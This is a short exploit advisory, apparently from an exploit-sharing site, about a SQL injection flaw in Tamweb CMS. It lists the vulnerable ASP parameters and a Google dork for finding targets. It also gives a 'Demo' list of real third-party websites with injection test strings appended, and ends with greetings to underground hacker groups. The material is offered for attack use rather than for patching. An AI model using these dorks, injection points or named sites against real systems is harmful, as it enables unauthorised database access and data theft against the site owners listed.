Tamweb CMS SQL Injection Vulnerability

# Name: Tamweb CMS SQL Injection Vulnerability
# Type: ASP
# Category: Webapps
# Web Site: http://www.tamweb.ir/
# Google Dork: inurl:*.asp intext:"[email protected]"
# Date: 4-Nov-2011
# Author: Mr.XHat
# Discovered By: Mr.XHat
# Tested On: Windows Server 2003 (IIS 6)
########################################

# Exploit

http://localhost/[Path]/article.asp?id=[SQLI]
http://localhost/News_Item.asp?content_ID=[SQLI]

# Demo:

http://www.tamweb.ir/blog/article.asp?id=21'
http://www.aria-atsez.com/content.asp?type=59'
http://exon-co.com/eproductlist-fa.asp?Content_ID=55'
http://www.aria-atsez.com/News_Item.asp?content_ID=26'

& More...
#########

Special Thanks To: #BHG Security Center And All Underground Hackers

Home: http://black-hg.org/cc/

Greets To: 1337day.com



#  0day.today [2018-01-10]  #